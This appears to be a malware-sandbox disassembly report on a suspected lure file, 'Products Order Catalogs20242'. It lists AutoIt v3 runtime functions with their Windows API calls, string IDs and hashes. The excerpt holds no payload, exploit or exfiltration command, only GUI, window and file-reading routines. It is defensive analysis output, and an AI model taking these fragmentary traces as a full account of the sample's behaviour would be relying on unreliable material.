                                                                                                • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                                                • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                • SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                • GetWindowLongW.USER32 ref: 00433E8A
                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                                                • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                                                • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                                                • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                                                • SelectObject.GDI32(?,?), ref: 00433F63
                                                                                                • DeleteObject.GDI32(?), ref: 00433F70
                                                                                                • SelectObject.GDI32(?,?), ref: 00433F78
                                                                                                • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                                                • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                                                • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                • String ID:
                                                                                                • API String ID: 1582027408-0
                                                                                                • Opcode ID: e151e7129dedd9b649cf5279759d6c8ca4f2d2edd5ec07a1e2c3294b07796789
                                                                                                • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                                                • Opcode Fuzzy Hash: e151e7129dedd9b649cf5279759d6c8ca4f2d2edd5ec07a1e2c3294b07796789
                                                                                                • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                                                APIs
                                                                                                • GetCursorPos.USER32(?), ref: 00456692
                                                                                                • GetDesktopWindow.USER32 ref: 004566AA
                                                                                                • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                                                • DestroyWindow.USER32(?), ref: 00456731
                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                                                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                                                • IsWindowVisible.USER32(?), ref: 00456812
                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                                                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                                                • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                                                • GetMonitorInfoW.USER32 ref: 00456894
                                                                                                • CopyRect.USER32(?,?), ref: 004568A8
                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                • String ID: ($,$tooltips_class32
                                                                                                • API String ID: 541082891-3320066284
                                                                                                • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                                                • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00454DCF
                                                                                                • _wcslen.LIBCMT ref: 00454DE2
                                                                                                • __wcsicoll.LIBCMT ref: 00454DEF
                                                                                                • _wcslen.LIBCMT ref: 00454E04
                                                                                                • __wcsicoll.LIBCMT ref: 00454E11
                                                                                                • _wcslen.LIBCMT ref: 00454E24
                                                                                                • __wcsicoll.LIBCMT ref: 00454E31
                                                                                                  • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                                                • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                                                • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                                                • DestroyIcon.USER32(?), ref: 00454FA2
                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                                                • String ID: .dll$.exe$.icl
                                                                                                • API String ID: 2511167534-1154884017
                                                                                                • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                                                • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                                                APIs
                                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                                                • _wcslen.LIBCMT ref: 00436B79
                                                                                                • _wcscpy.LIBCMT ref: 00436B9F
                                                                                                • _wcscat.LIBCMT ref: 00436BC0
                                                                                                • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                                                • _wcscat.LIBCMT ref: 00436C2A
                                                                                                • _wcscat.LIBCMT ref: 00436C31
                                                                                                • __wcsicoll.LIBCMT ref: 00436C4B
                                                                                                • _wcsncpy.LIBCMT ref: 00436C62
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                • API String ID: 1503153545-1459072770
                                                                                                • Opcode ID: 8f115a8dcca366765dccafad874a9911a33c709b0333e454bef2361e27f7839d
                                                                                                • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                                                • Opcode Fuzzy Hash: 8f115a8dcca366765dccafad874a9911a33c709b0333e454bef2361e27f7839d
                                                                                                • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                                                APIs
                                                                                                  • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                                                • _fseek.LIBCMT ref: 004527FC
                                                                                                • __wsplitpath.LIBCMT ref: 0045285C
                                                                                                • _wcscpy.LIBCMT ref: 00452871
                                                                                                • _wcscat.LIBCMT ref: 00452886
                                                                                                • __wsplitpath.LIBCMT ref: 004528B0
                                                                                                • _wcscat.LIBCMT ref: 004528C8
                                                                                                • _wcscat.LIBCMT ref: 004528DD
                                                                                                • __fread_nolock.LIBCMT ref: 00452914
                                                                                                • __fread_nolock.LIBCMT ref: 00452925
                                                                                                • __fread_nolock.LIBCMT ref: 00452944
                                                                                                • __fread_nolock.LIBCMT ref: 00452955
                                                                                                • __fread_nolock.LIBCMT ref: 00452976
                                                                                                • __fread_nolock.LIBCMT ref: 00452987
                                                                                                • __fread_nolock.LIBCMT ref: 00452998
                                                                                                • __fread_nolock.LIBCMT ref: 004529A9
                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                • __fread_nolock.LIBCMT ref: 00452A39
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                • String ID:
                                                                                                • API String ID: 2054058615-0
                                                                                                • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                                                • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0
                                                                                                • API String ID: 0-4108050209
                                                                                                • Opcode ID: 3341d5ccd3f52121a0b9d5f5b9edb9a4c3413db68c9c5c7597b80800bbf161ae
                                                                                                • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                                                • Opcode Fuzzy Hash: 3341d5ccd3f52121a0b9d5f5b9edb9a4c3413db68c9c5c7597b80800bbf161ae
                                                                                                • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                                                APIs
                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                                                • GetClientRect.USER32(?,?), ref: 004701FA
                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                                                • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                                                • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                                                • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                                                • GetClientRect.USER32(?,?), ref: 00470371
                                                                                                • GetStockObject.GDI32(00000011), ref: 00470391
                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                                                • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                • String ID: AutoIt v3 GUI
                                                                                                • API String ID: 867697134-248962490
                                                                                                • Opcode ID: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
                                                                                                • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                                                • Opcode Fuzzy Hash: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
                                                                                                • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window
                                                                                                • String ID: 0
                                                                                                • API String ID: 2353593579-4108050209
                                                                                                • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                                                • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                                                APIs
                                                                                                • GetSysColor.USER32 ref: 0044A11D
                                                                                                • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                                • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                                                • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                                                • GetWindowDC.USER32 ref: 0044A277
                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                                • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                                • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                • String ID:
                                                                                                • API String ID: 1744303182-0
                                                                                                • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                                                • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll$__wcsnicmp
                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                • API String ID: 790654849-1810252412
                                                                                                • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                                                • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitVariant
                                                                                                • String ID:
                                                                                                • API String ID: 1927566239-0
                                                                                                • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                                                • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                                                APIs
                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                                                • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                                                • IsWindow.USER32(?), ref: 0046DBDE
                                                                                                • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                                                • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                                                • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                                  • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                • API String ID: 1322021666-1919597938
                                                                                                • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                                                • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
